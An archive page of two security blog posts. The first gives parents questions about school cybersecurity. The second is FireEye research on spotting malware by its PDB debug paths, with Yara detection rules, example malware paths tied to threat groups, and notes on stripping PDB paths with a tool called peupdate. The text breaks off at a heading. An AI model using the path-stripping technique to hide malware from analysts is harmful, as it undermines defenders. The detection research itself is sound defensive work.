Monthly Archives: August 2019

7 Questions to Ask Your Child’s School About Cybersecurity Protocols

Just a few weeks into the new school year and, already, reports of malicious cyberattacks on schools have hit the headlines. While you’ve made digital security strides in your home, what concerns, if any, should you have about your child’s data being compromised at school?

There’s a long and a short answer to that question. The short answer is don’t lose sleep (much of this is out of your control), but get clarity and peace of mind by asking your school officials the right questions.

The long answer is that cybercriminals have schools in their digital crosshairs. According to a recent report in The Hill, school districts are becoming top targets of malicious attacks, and government entities are scrambling to fight back. These attacks are costing school districts (taxpayers) serious dollars and costing kids (and parents) their privacy.


Prime Targets

According to one report, a U.S. school district becomes the victim of a cyberattack as often as every three days. The reason is that cybercriminals want clean data to exploit for dozens of nefarious purposes, and the best place to harvest pristine data is schools, where social security numbers are usually unblemished and go unchecked for years. At the same time, student data can be collected and sold on the dark web. Data at risk includes vaccination records, birthdates, addresses, phone numbers, and contacts, all of which can be used for identity theft.

Top Three Cyberthreats

The top three threats against schools are data breaches, phishing scams, and ransomware. Data breaches can happen through phishing scams and malware attacks, which may arrive as malicious email links or fake accounts posing as acquaintances. In a ransomware attack, a hacker locks down a school’s digital network and holds its data for ransom.

Over the past month, hackers have hit K-12 schools in New Jersey, New York, Wisconsin, Virginia, Oklahoma, Connecticut, and Louisiana. Universities are also targeted.

In the schools impacted, criminals were able to find loopholes in their security protocols. A loophole can be an unprotected device, a printer, or a malicious email link opened by a new employee. It can even be a calculated scam like the Virginia school duped into paying a fraudulent vendor $600,000 for a football field. The cybercrime scenarios are endless. 

7 key questions to ask

  1. Does the school have a data security and privacy policy in place, as well as a cyberattack response plan?
  2. Does the school have a system to educate staff, parents, and students about potential risks and safety protocols? 
  3. Does the school have a data protection officer on staff responsible for implementing security and privacy policies?
  4. Does the school have reputable third-party vendors to ensure the proper technology is in place to secure staff and student data?
  5. Are data security and student privacy a fundamental part of onboarding new school employees?
  6. Does the school create backups of valuable information and store them separately from the central server to protect against ransomware attacks?
  7. Does the school have any new technology initiatives planned? If so, how will it address student data protection?

The majority of schools are far from negligent. Leaders know the risks, and many have put recognized cybersecurity frameworks in place. Schools also face the pressing, threefold challenge of (1) providing a technology-driven education to students while (2) protecting student and staff privacy and (3) finding the funds to address the escalating risk.

Families can add a layer of protection to a child’s data while at school by making sure devices are protected in a Bring Your Own Device (BYOD) setting. Cybersecurity is a shared responsibility. While schools work hard to implement safeguards, be sure you are taking responsibility in your digital life and equipping your kids to do the same. 

 

The post 7 Questions to Ask Your Child’s School About Cybersecurity Protocols appeared first on McAfee Blogs.

Definitive Dossier of Devilish Debug Details – Part One: PDB Paths and Malware

Have you ever wondered what goes through the mind of a malware author? How they build their tools? How they organize their development projects? What kind of computers and software they use? We took a stab at answering some of those questions by exploring malware debug information.

We find that malware developers give descriptive names to their folders and code projects, often describing the capabilities of the malware in development. These descriptive names thus show up in a PDB path when a malware project is compiled with symbol debugging information. Everyone loves an origin story, and debugging information gives us insight into the malware development environment, a small but important keyhole into where and how a piece of malware was born. We can use our newfound insight to detect malicious activity based in part on PDB paths and other debug details.

Welcome to part one of a multi-part, tweet-inspired series about PDB paths, their relation to malware, and how they may be useful in both defensive and offensive operations.

Human-Computer Conventions

Digital storage systems have revolutionized our world, but to make use of our stored data and retrieve it efficiently, we must organize it sensibly. Users structure directories carefully and give files and folders unique and descriptive names, often naming them based on their content. Computers force users to label and annotate their data based on the data type, role, and purpose. This human-computer convention means that most digital content has some descriptive surface area, or descriptive “features,” that are present in many files, including malware files.

FireEye approaches detection and hunting from many angles, but on FireEye’s Advanced Practices team, we often like to flex on “weak signals.” We like to search for features of malware that are not evil in isolation but uncommon or unique enough to be useful. We create conditional rules that, when met, are “weak signals” telling us that a subset of data, such as a file object or a process, has some odd or novel features. These features are often incidental outcomes of adversary methods, or modus operandi, that each represent deliberate choices made by malware developers or intrusion operators. Not all these features were meant to be in there, and they were certainly not intended for defenders to notice. This is especially true for PDB paths, which can be described as an outcome of the compilation process, a toolmark left in malware that describes the development environment.

PDBs

A program database (PDB) file, often referred to as a “symbol file,” is generated upon compilation to store debugging information about an individual build of a program. A PDB may store symbols, addresses, names of functions and resources, and other information that may assist with debugging the program to find the exact source of an exception or error.

Malware is software, and malware developers are software developers. Like any software developers, malware authors often have to debug their code and sometimes end up creating PDBs as part of their development process. If they do not spend time debugging their malware, they risk their malware not functioning correctly on victim hosts, or not being able to successfully communicate with their malware remotely.

How PDB Paths are Made (the birds and the PDBs?)

But how are PDBs created and connected to programs? Let’s examine the formation of one PDB path through the eyes of a malware developer and blogger, the soon-to-be-infamous “smiller.”

Smiller has a lot of programming projects and organizes them in an aptly labeled folder structure on his computer. This project is for a shellcode loader embedded in an HTML Application (HTA) file, and the developer stores it quite logically in the folder:

D:\smiller\projects\super_evil_stuff\shellcode\


Figure 1: The simple “Test” project code file “Program.cs” which embeds a piece of shellcode and a launcher executable within an HTML Application (HTA) file


Figure 2: The malicious Visual Studio solution HtaDotnet and corresponding “Test” project folder as seen through Windows Explorer. The names of the folders and files are suggestive of their functionalities

The malware author then compiles their “Test” project in Visual Studio using the default “Debug” configuration (Figure 3), which writes out Test.exe and Test.pdb to a subfolder (Figure 4).


Figure 3: The Visual Studio output of a default compiling configuration


Figure 4: Test.exe and Test.pdb are written to a default subfolder of the code project folder

In the Test.pdb file (Figure 5) there are references to the original path for the source code files along with other binary information for use in debugging.


Figure 5: Test.pdb contains binary debug information and references to the original source code files for use in debugging

During compilation, the linker associates the PDB file with the built executable by adding an entry to the IMAGE_DEBUG_DIRECTORY specifying the type of the debug information. In this case, the debug type is CodeView, so the PDB path is embedded in the IMAGE_DEBUG_TYPE_CODEVIEW portion of the file. This enables a debugger to locate the correct PDB file, Test.pdb, while debugging Test.exe.


Figure 6: Test.exe as shown in the PEview utility, which easily parses out the PDB path from the IMAGE_DEBUG_TYPE_CODEVIEW section of the executable file

PDB Path in CodeView Debug Information

CodeView Structure

The exact format of the debug information may vary depending on compiler and linker and the modernity of one’s software development tools. CodeView debug information is stored under IMAGE_DEBUG_TYPE_CODEVIEW in the following structure:

Type     Description
DWORD    "RSDS" header
GUID     16-byte Globally Unique Identifier
DWORD    "age" (incrementing # of revisions)
BYTE     PDB path, null terminated

Figure 7: Structure of CodeView debug directory information
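To make the structure concrete, the four fields above can be parsed with a few lines of Python. This is a minimal sketch of ours, not FireEye tooling; the function name and sample bytes are illustrative:

```python
import struct
import uuid

def parse_codeview_rsds(data: bytes):
    """Split a CodeView "RSDS" (PDB 7.0) debug blob into its fields:
    4-byte signature, 16-byte GUID, 4-byte age, null-terminated PDB path."""
    if data[:4] != b"RSDS":
        raise ValueError("not an RSDS CodeView blob")
    guid = uuid.UUID(bytes_le=data[4:20])        # GUID is stored little-endian
    (age,) = struct.unpack_from("<I", data, 20)  # incrementing revision count
    end = data.index(b"\x00", 24)                # path is null terminated
    return guid, age, data[24:end].decode("utf-8", errors="replace")

# Illustrative blob carrying a partially qualified path:
blob = b"RSDS" + b"\x11" * 16 + b"\x01\x00\x00\x00" + b"Test.pdb\x00"
guid, age, path = parse_codeview_rsds(blob)  # age == 1, path == "Test.pdb"
```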

Full Versus Partial PDB Path

There are generally two buckets of CodeView PDB paths: those that are fully qualified directory paths, and those that are partially qualified and specify only the name of the PDB file. In both cases, the name of the PDB file with the .pdb extension is included to ensure the debugger locates the correct PDB for the program.

A partially qualified PDB path would list only the PDB file name, such as:

Test.pdb

A fully qualified PDB path usually begins with a volume drive letter and a directory path to the PDB file name such as:

D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb

Typically, native Windows executables use a partially qualified PDB path because many of the debug PDB files are publicly available on the Microsoft public symbol server, so the fully qualified path is unnecessary in the symbol path (the PDB path). For the purposes of this research, we will be mostly looking at fully qualified PDB paths.
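One simple way to separate the two buckets programmatically is to test for a leading drive letter. The Python helper below is a rough heuristic of ours, not an exhaustive path parser:

```python
import re

# Heuristic: fully qualified CodeView paths begin with a drive letter,
# a colon, and a backslash; everything else we treat as partial.
def is_fully_qualified(pdb_path: str) -> bool:
    return re.match(r"[A-Za-z]:\\", pdb_path) is not None

print(is_fully_qualified(r"D:\smiller\projects\super_evil_stuff\shellcode\Test\obj\Debug\Test.pdb"))  # True
print(is_fully_qualified("Test.pdb"))  # False
```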

Surveying PDB Paths in Malware

In Operation Shadowhammer, which has a myriad of connections to APT41, one sample had a simple, yet descriptive PDB path: “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”

The naming makes perfect sense. The malware was intended to masquerade as Asus Corporation software, and the role of the malware was shellcode. The malware developer named the project after the function and role of the malware itself.

If we accept that the nature of digital data forces developers into these naming conventions, we would expect the conventions to hold true across other threat actors, malware families, and intrusion operations. FireEye’s Advanced Practices team loves to take seemingly innocuous features of an intrusion set and determine what about them is good, bad, and ugly. What is normal, and what is abnormal? What is globally prevalent, and what is rare? What are malware authors doing differently from non-malware developers? What assumptions can we make and measure?

Letting our curiosity take the wheel, we adapted the CodeView debug information structure into a regular expression (Figure 8) and developed Yara rules (Figure 9) to survey our data sets. This helped us identify commonalities and enabled us to see which threat actors and malware families may be “detectable” based only on features within PDB path strings.


Figure 8: A Perl-compatible regular expression (PCRE) adaptation of the PDB7 debug information in an executable to include a specific keyword


Figure 9: Template Yara rule to search for executables with PDB files matching a keyword
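The same survey logic can be approximated outside of Yara. Below is a rough Python analogue of such a keyword rule, scanning raw file bytes for an RSDS record whose embedded path contains a given keyword; the "shellcode" keyword and sample bytes are illustrative, and this sketch ignores the PE header checks the Yara rules perform:

```python
import re

def pdb_keyword_regex(keyword: bytes) -> re.Pattern:
    # RSDS signature, then 20 bytes (16-byte GUID + 4-byte age), then a
    # drive-letter path containing the keyword, ending in ".pdb" + null.
    return re.compile(
        rb"RSDS[\x00-\xff]{20}[a-zA-Z]:\\[\x00-\xff]{0,200}"
        + re.escape(keyword)
        + rb"[\x00-\xff]{0,200}\.pdb\x00",
        re.IGNORECASE,
    )

pattern = pdb_keyword_regex(b"shellcode")
sample = b"RSDS" + b"\x00" * 20 + b"D:\\projects\\shellcode\\Test.pdb\x00"
print(bool(pattern.search(sample)))  # True
```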

PDB Path Showcase: Malware Naming Conventions

We surveyed 10+ million samples in our incident response and malware corpus and found plenty of common PDB path keywords that transcend sources, victims, affected regions, impacted industries, and actor motivations. To help articulate the broad reach of these malware developer commonalities, we detail a handful of the stronger keywords along with example PDB paths and the malware families and threat groups in which at least one sample carries the applicable keyword.

Please note that the example paths and represented malware families and groups are a selection from the total data set, and not necessarily correlated, clustered or otherwise related to each other. This is intended to illustrate the wide presence of PDB paths with keywords and how malware developers, irrespective of origin, targets and motivations often end up using some of the same words in their naming. We believe that this commonality increases the surface area of malware and introduces new opportunities for detection and hunting.

PDB Path Keyword Prevalence

anti
Families and groups observed: RUNBACK, HANDSTAMP, LOKIBOT, NETWIRE, DARKMOON, PHOTO, RAWHIDE, DUCKFAT, HIGHNOON, DEEPOCEAN, SOGU, CANNONFODDER; APT10, APT24, APT41, UNC589, UNC824, UNC969, UNC765
Example PDB path: H:\RbDoor\Anti_winmm\AppInit\AppInit\Release\AppInit.pdb

attack
Families and groups observed: MINIASP, SANNY, DIRTCHEAP, ORCUSRAT; APT1, UNC776, UNC251, UNC1131
Example PDB path: E:\C\Attack\mini_asp-0615\attack\MiniAsp3\Release\MiniAsp.pdb

backdoor
Families and groups observed: PACMAN, SOUNDWAVE, PHOTO, WINERACK, DUALGUN; APT41, APT34, APT37, UNC52, UNC1131, APT40
Example PDB path: Y:\Hack\backdoor\3-exe-attack\temp\UAC_Elevated\win32\UAC_Elevated.pdb

bind
Families and groups observed: SCREENBIND, SEEGAP, CABLECAR, UPDATESEE, SEEDOOR, TURNEDUP, CABROCK, YABROD, FOXHOLE; UNC373, UNC510, UNC875, APT36, APT33, APT5, UNC822
Example PDB path: C:\Documents and Settings\ss\桌面\tls\scr\bind\bind\Release\bind.pdb

bypass
Families and groups observed: POSHC2, FIRESHADOW, FLOWERPOT, RYUK, HAYMAKER, UPCONTROL, PHOTO, BEACON, SOGU; APT10, APT34, APT21, UNC1289, UNC1450
Example PDB path: C:\Documents and Settings\Administrator\桌面\BypassUAC.VS2010\Release\Go.pdb

downloader
Families and groups observed: SPICYBEAN, GOOSEDOWN, ANTFARM, BUGJUICE, ENFAL, SOURFACE, KASPER, ELMER, TWOBALL, KIBBLEBITS; APT28, UNC1354, UNC1077, UNC27, UNC653, UNC1180, UNC1031
Example PDB path: Z:\projects\vs 2012\Inst DWN and DWN XP\downloader_dll_http_mtfs\Release\downloader_dll_http_mtfs.pdb

dropper
Families and groups observed: CITADEL, FIDDLELOG, SWIFTKICK, KAYSLICE, FORMBOOK, EMOTET, SANNY, FIDDLEWOOD, DARKNEURON, URSNIF, RUNOFF; UNC776, UNC1095, APT29, APT36, UNC964, UNC1437, UNC849
Example PDB path: D:\Task\DDE Attack\Dropper_Original\Release\Dropper.pdb

exploit
Families and groups observed: TRICKBOT, RUNBACK, PUNCHOUT, QANAT, OZONERAT; UNC1030, APT39, APT34, FIN6
Example PDB path: w:\modules\exploits\littletools\agent_wrapper\release\12345678901234567890123456789012345678\wrapper3.pdb

fake
Families and groups observed: FIRESHADOW; UNC1172, APT39, UNC822
Example PDB path: D:\Work\Project\VS\house\Apple\Apple_20180115\Release\FakeRun.pdb

fuck
Families and groups observed: TRICKBOT, CEREAL, KRYPTONITE, SUPERMAN; APT17, UNC208, UNC276
Example PDB path: E:\CODE\工程文件\20110505_LEVNOhard\CODE\AnyRat\FuckAll'sUI\bin\FuckAll.pdb

hack
Families and groups observed: PHOTO, KILLDEVIL, NETWIRE, PACMAN, BADSIGN, TRESOCHO, BADGUEST, GH0ST, VIPSHELL; UNC1152, APT40, UNC78, UNC874, UNC52, UNC502, APT33, APT8
Example PDB path: C:\Users\Alienware.DESKTOP-MKL3QDN\Documents\Hacker\memorygrabber - ID\memorygrabber\obj\x86\Debug\vshost.pdb

hide
Families and groups observed: FRESHAIR, DIRTYWORD, GH0ST, DARKMOON, FIELDGOAL, RAWHIDE, DLLDOOR, TRICKBOT, 008S, JAMBOX, SOGU, CANDYSHELL; APT26, APT40, UNC213, UNC44, UNC53, UNC282
Example PDB path: c:\winddk\6001.18002\work\hideport\i386\HidePort.pdb

hook
Families and groups observed: GEARSHIFT, METASTAGE, FASTPOS, HANDSTAMP, FON, CLASSFON, WATERFAIRY, RATVERMIN; UNC842, UNC1197, UNC1040, UNC969
Example PDB path: D:\รายงาน\C++ & D3D & Hook & VB.NET & PROJECT\Visual Studio 2010\CodeMaster OnlyTh\Inject_Win32_2\Inject Win32\Inject Win32\Release\OLT_PBFREE.pdb

inject
Families and groups observed: SKNET, KOADIC, ISMAGENT, FULLTRUNK, ZZINJECT, ENFAL, RANSACK, GEARSHIFT, LOCKLOAD, WHIPSNAP, BEACON, CABROCK, HIGHNOON, DETECT, THREESNEAK, FOXHOLE; UNC606, APT10, APT34, APT41, UNC373, APT31, APT19, APT1, UNC82, UNC1168, UNC1149, UNC575
Example PDB path: E:\0xFFDebug\My Source\HashDump\Release\injectLsa.pdb

install
Families and groups observed: FIRESHADOW, SCRAPMINT, BRIGHTCOMB, WINERACK, SLUDGENUDGE, ANCHOR, EXCHAIN, KIBBLEBITS, ENFAL, DANCEPARTY, SLIMEGRIME, DRABCUBE, DIMWIT, THREESNEAK, GOOGONE, STEW, LOWLIGHT, QUASIFOUR, CANNONFODDER, EASYCHAIR, ONETOFOUR, DEEPOCEAN, BRIGHTCREST, LUMBERJACK, EVILTOSS, BRIGHTCYAN, PEKINGDUCK, SIDEVIEW, BOSSNAIL; UNC869, UNC385, UNC228, APT5, UNC229, APT26, APT37, UNC432, APT18, UNC27, APT6, UNC1172, UNC593, UNC451, UNC875, UNC53
Example PDB path: i:\LIE_SHOU\URL_CURUN-A\installer\Release\jet.pdb

keylog
Families and groups observed: LIMITLESS, ZZDROP, WAVEKEY, FIDDLEKEYS, SKIDHOOK, HAWKEYE, BEACON, DIZZYLOG, SOUNDWAVE; APT37, UNC82, UNC1095, APT1, APT40
Example PDB path: D:\TASK\ProgamsByMe(2015.1~)\MyWork\Relative Backdoor\KeyLogger_ScreenCap_Manager\Release\SoundRec.pdb

payload
Families and groups observed: POSHC2, SHAKTI, LIMITLESS, RANSACK, CATRUNNER, BREAKDANCE, DARKMOON, METERPRETER, DHARMA, GAMEFISH, RAWHIDE, LIGHTPOKE; UNC915, UNC632, UNC1149, APT28, UNC878
Example PDB path: C:\Users\WIN-2-ViHKwdGJ574H\Desktop\NSA\Payloads\windows service cpp\Release\CppWindowsService.pdb

shell
Families and groups observed: SOGU, RANSACK, CARBANAK, BLACKCOFFEE, SIDEWINDER, PHOTO, SHIMSHINE, PILLOWMINT, POSHC2, PI, METASTAGE, GH0ST, VIPSHELL, GAUSS, DRABCUBE, FINDLOCK, NEDDYSHELL, MONOPOD, FIREPIPE, URSNIF, KAYSLICE, DEEPOCEAN, EIGHTONE, DAYJOB, EXCALIBUR, NICECATCH; UNC48, UNC1225, APT17, UNC1149, APT35, UNC251, UNC521, UNC8, UNC849, UNC1428, UNC1374, UNC53, UNC1215, UNC964, UNC1217, APT3, UNC671, UNC757, UNC753, APT10, APT34, UNC229, APT18, APT9, UNC124, UNC1559
Example PDB path: E:\windows\dropperNew\Debug\testShellcode.pdb

sleep
Families and groups observed: URSNIF, CARBANAK, PILLOWMINT, SHIMSHINE, ICEDID; FIN7
Example PDB path: O:\misc_src\release_priv_aut_v2.2_sleep_DATE\my\src\sdb_test_dll\x64\Release\sdb_test.pdb

spy
Families and groups observed: DUSTYSKY, OFFTRACK, SCRAPMINT, FINSPY, LOCKLOAD, WINDOLLAR; FIN7, UNC583, UNC822, UNC1120
Example PDB path: G:\development\Winspy\ntsvc32-93-01-05\x64\Release\ntsvcst32.pdb

trojan
Families and groups observed: ENFAL, IMMINENTMONITOR, MSRIP, GH0ST, LITRECOLA, DIMWIT; UNC1373, UNC366, APT19, UNC1352, UNC27, APT1, UNC981, UNC581, UNC1559
Example PDB path: e:\work\projects\trojan\client\dll\i386\Client.pdb

Figure 10: A selection of common keywords in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Suspicious Developer Environment Terms

The keywords that typically describe malware are strong enough to raise red flags, but other common terms or features in PDB paths may signal that an executable was compiled in a non-enterprise setting. For example, any PDB path containing a “Users” directory tells you that the executable was likely compiled on Windows Vista/7/10 and likely does not represent an “official” or “commercial” development environment. The term “Users” is much weaker, or lower in fidelity, than “shellcode,” but as we demonstrate below, these terms are indeed present in lots of malware and can be used as weak detection signals.

PDB Path Term Prevalence

Users
Families and groups observed: ABBEYROAD, AGENTTESLA, ANTFARM, AURORA, BEACON, BLACKDOG, BLACKREMOTE, BLACKSHADESRAT, BREAKDANCE, BROKEYOLK, BUSYFIB, CAMUBOT, CARDCAM, CATNAP, CHILDSPLAY, CITADEL, CROSSWALK, CURVEBALL, DARKCOMET, DARKMOON, DESERTFALCON, DESERTKATZ, DISPKILL, DIZZYLOG, EMOTET, FIDDLEWOOD, FIVERINGS, FLATTOP, FLUXXY, FOOTMOUSE, FORMBOOK, GOLDENCAT, GROK, GZIPDE, HAWKEYE, HIDDENTEAR, HIGHNOTE, HKDOOR, ICEDID, ICEFOG, ISMAGENT, KASPER, KOADIC, LUKEWARM, LUXNET, MOONRAT, NANOCORE, NETGRAIL, NJRAT, NUTSHELL, ONETOFOUR, ORCUSRAT, POISONIVY, POSHC2, QUASARRAT, QUICKHOARD, RADMIN, RANSACK, RAWHIDE, REMCOS, REVENGERAT, RYUK, SANDPIPE, SANDTRAP, SCREENTIME, SEEDOOR, SHADOWTECH, SILENTBYTES, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, SOREGUT, SOURCANDLE, TREASUREHUNT, TRENDCLOUD, TRESOCHO, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, TWINSERVE, UPCONTROL, UPDATESEE, URSNIF, WATERFAIRY, XHUNTER, XRAT, ZEUS; APT5, APT10, APT17, APT33, APT34, APT35, APT36, APT37, APT39, APT40, APT41, FIN6, UNC284, UNC347, UNC373, UNC432, UNC632, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1065, UNC1124, UNC1149, UNC1152, UNC1197, UNC1289, UNC1295, UNC1340, UNC1352, UNC1354, UNC1374, UNC1406, UNC1450, UNC1486, UNC1507, UNC1516, UNC1534, UNC1545, UNC1562
Example PDB path: C:\Users\Yousef\Desktop\MergeFiles\Loader v0\Loader\obj\Release\Loader.pdb

ConsoleApplication / WindowsApplication / WindowsFormsApplication (Visual Studio default project names)
Families and groups observed: CROSSWALK, DESERTKATZ, DIZZYLOG, FIREPIPE, HIGHPRIEST, HOUDINI, HTRAN, KICKBACK, LUKEWARM, MOONRAT, NIGHTOWL, NJRAT, ORCUSRAT, REDZONE, REVENGERAT, RYUK, SEEDOOR, SLOAD, SOGU, TRICKBOT, TRICKSHOW; APT1, APT34, APT36, FIN6, UNC251, UNC729, UNC1078, UNC1147, UNC1172, UNC1267, UNC1277, UNC1289, UNC1295, UNC1340, UNC1470, UNC1507
Example PDB path: D:\Projects\ByPassAV\ConsoleApplication1\Release\ConsoleApplication1.pdb

New Folder
Families and groups observed: HOMEUNIX, KASPER, MOONRAT, NANOCORE, NETWIRE, OZONERAT, POISONIVY, REMCOS, SKIDHOOK, TRICKBOT, TURNEDUP, URLZONE; APT18, APT33, APT36, UNC53, UNC74, UNC672, UNC718, UNC1030, UNC1289, UNC1340, UNC1559
Example PDB path: c:\Users\USA\Documents\Visual Studio 2008\Projects\New folder (2)\kasper\Release\kasper.pdb

Copy
Families and groups observed: DESERTFALCON, KASPER, NJRAT, RYUK, SOGU; UNC124, UNC718, UNC757, UNC1065, UNC1215, UNC1225, UNC1289
Example PDB path: D:\dll_Mc2.1mc\2.4\2.4.2 xor\zhu\dll_Mc - Copy\Release\shellcode.pdb

Desktop
Families and groups observed: AGENTTESLA, AVEO, BEACON, BUSYFIB, CHILDSPLAY, COATHOOK, DESERTKATZ, FIVERINGS, FLATTOP, FORMBOOK, GH0ST, GOLDENCAT, HIGHNOTE, HTRAN, IMMINENTMONITOR, KASPER, KOADIC, LUXNET, MOONRAT, NANOCORE, NETWIRE, NUTSHELL, ORCUSRAT, RANSACK, RUNBACK, SEEDOOR, SKIDHOOK, SLIMCAT, SLOWROLL, SOGU, TIERNULL, TINYNUKE, TRICKBOT, TRIK, TROCHILUS, TURNEDUP, UPDATESEE, WASHBOARD, WATERFAIRY, XRAT; APT5, APT17, APT26, APT33, APT34, APT35, APT36, APT41, UNC53, UNC276, UNC308, UNC373, UNC534, UNC551, UNC572, UNC672, UNC718, UNC757, UNC791, UNC824, UNC875, UNC1124, UNC1149, UNC1197, UNC1352
Example PDB path: C:\Users\Develop_MM\Desktop\sc_loader\Release\sc_loader.pdb

Figure 11: A selection of common terms in PDB paths with groups and malware families observed and examples

PDB Path Showcase: Exploring Anomalies

Outside of keywords and terms, we discovered a few uncommon (to us) features that may be interesting for future research and detection opportunities.

Non-ASCII Characters

PDB paths with any non-ASCII characters have a high ratio of malware to non-malware in our datasets. The strength of this signal is only because of a data bias in our malware corpus and in our client base. However, if this data bias is consistent, we can use the presence of non-ASCII characters in a PDB path as a signal that an executable merits further scrutiny. In organizations that operate primarily in the world of ASCII, we imagine this will be a strong signal. Below we express logic for this technique in Yara:

rule ConventionEngine_Anomaly_NonAscii
{
    meta:
        author = "@stvemillertime"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,500}[^\x00-\x7F]{1,}[\x00-\xFF]{0,500}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}
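For quick triage outside of Yara, the equivalent check on an already-extracted path string is a one-liner. The helper below is our own illustrative sketch:

```python
def has_non_ascii(pdb_path: str) -> bool:
    # Any code point above 0x7F falls outside the ASCII range.
    return any(ord(ch) > 0x7F for ch in pdb_path)

print(has_non_ascii(r"C:\Documents and Settings\ss\桌面\tls\scr\bind\Release\bind.pdb"))  # True
print(has_non_ascii(r"D:\C++\AsusShellCode\Release\AsusShellCode.pdb"))  # False
```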

Multiple Paths in a Single File

Each compiled program should only have one PDB path. The presence of multiple PDB paths in a single object indicates that the object has subfile executables, from which you may infer that the parent object has the capability to “drop” or “install” other files. While being a dropper or installer is not malicious on its own, having an alternative method of applying those classifications to file objects may be of assistance in surfacing malicious activity. In this example, we can also search for this capability using Yara:

rule ConventionEngine_Anomaly_MultiPDB_Triple
{
    meta:
        author = "@stvemillertime"
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #anchor == 3 and #pcre == 3
}

Outside of a Debug Section

When a file is compiled, the entry for the debug information is in the IMAGE_DEBUG_DIRECTORY. Similar to seeing multiple PDB paths in a single file, when we see debug information inside an executable that does not have a debug directory, we can infer that the file has subfile executables and likely has dropper or installer functionality. In this rule, we use Yara’s convenient PE module to check the relative virtual address (RVA) of the IMAGE_DIRECTORY_ENTRY_DEBUG entry; if it is zero, we can presume that there is no debug entry, and thus the presence of a CodeView PDB path indicates that there is a subfile.

import "pe"

rule ConventionEngine_Anomaly_OutsideOfDebug
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
    strings:
        $anchor = "RSDS"
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $anchor and $pcre and pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_DEBUG].virtual_address == 0
}

Nulled Out PDB Paths

In the typical CodeView section, we would see the “RSDS” header, the 16-byte GUID, a 4-byte “age” and then a PDB path string. However, we’ve identified a significant number of malware samples where the embedded PDB path area is nulled out. In this example, we can easily see the CodeView debug structure, complete with header, GUID and age, followed by nulls to the end of the segment.

00147880: 52 53 44 53 18 c8 03 4e 8c 0c 4f 46 be b2 ed 9e : RSDS...N..OF....
00147890: c1 9f a3 f4 01 00 00 00 00 00 00 00 00 00 00 00 : ................
001478a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
001478c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 : ................
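Given an extracted CodeView blob like the one above, spotting this tampering is straightforward. A minimal Python sketch of ours (the helper name is illustrative):

```python
def has_nulled_pdb_path(codeview: bytes) -> bool:
    # 4-byte "RSDS" + 16-byte GUID + 4-byte age = 24 bytes of header;
    # a nulled-out sample carries only \x00 bytes where the path should be.
    return (
        codeview[:4] == b"RSDS"
        and len(codeview) > 24
        and set(codeview[24:]) == {0}
    )

# Bytes reconstructed from the hex dump above (null run truncated):
tampered = bytes.fromhex("5253445318c8034e8c0c4f46beb2ed9ec19fa3f401000000") + b"\x00" * 16
print(has_nulled_pdb_path(tampered))  # True
```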

There are a few possibilities for how and why a CodeView PDB path may be nulled out, but in the case of intentional tampering to remove toolmarks, the easiest way would be to manually overwrite the PDB path with \x00s. The risk of manually editing with a hex editor is that doing so is laborious and may introduce other static anomalies, such as checksum errors.

The next easiest way is to use a utility designed to wipe debug artifacts from executables. One stellar example is “peupdate,” which can not only strip or fabricate the PDB path information but also recalculate the checksum and eliminate Rich headers. Below we demonstrate the use of peupdate to clear the PDB path.


Figure 12: Using peupdate to clear the PDB path information from a sample of malware


Figure 13: The peupdate tampered malware as shown in the PEview utility. We see the CodeView section is still present but the PDB path value has been cleared out

PDB Path Anomaly Prevalence

Non-ASCII characters
Families and groups observed: 008S, AGENTTESLA, BADSIGN, BAGELBYTE, BIRDSEED, BLACKCOFFEE, CANNONFODDER, CARDDROP, CEREAL, CHILDSPLAY, COATHOOK, CURVEBALL, DANCEPARTY, DIMWIT, DIZZYLOG, EARTHWORM, EIGHTONE, ELISE, ELKNOT, ENFAL, EXCHAIN, FANNYPACK, FLOWERPOT, FREELOAD, GH0ST, GINGERYUM, GLASSFLAW, GLOOXMAIL, GOLDENCAT, GOOGHARD, GOOGONE, HANDSTAMP, HELLWOOD, HIGHNOON, ICEFOG, ISHELLYAHOO, JAMBOX, JIMA, KRYPTONITE, LIGHTSERVER, LOCKLOAD, LOKIBOT, LOWLIGHT, METASTAGE, NETWIRE, PACMAN, PARITE, POISONIVY, PIEDPIPER, PINKTRIP, PLAYNICE, QUASARRAT, REDZONE, SCREENBIND, SHADOWMASK, SHORTLEASH, SIDEWINDER, SLIMEGRIME, SOGU, SUPERMAN, SWEETBASIL, TEMPFUN, TRAVELNET, TROCHILUS, URSNIF, VIPER, VIPSHELL; APT1, APT2, APT3, APT5, APT6, APT9, APT10, APT14, APT17, APT18, APT20, APT21, APT23, APT24, APT26, APT31, APT33, APT41, UNC20, UNC27, UNC39, UNC53, UNC74, UNC78, UNC1040, UNC1078, UNC1172, UNC1486, UNC156, UNC208, UNC229, UNC237, UNC276, UNC293, UNC366, UNC373, UNC451, UNC454, UNC521, UNC542, UNC551, UNC556, UNC565, UNC584, UNC629, UNC753, UNC794, UNC798, UNC969
Example PDB path: I:\RControl\小工具\123\判断加载着\Release\判断加载着.pdb

Multiple paths in a single file
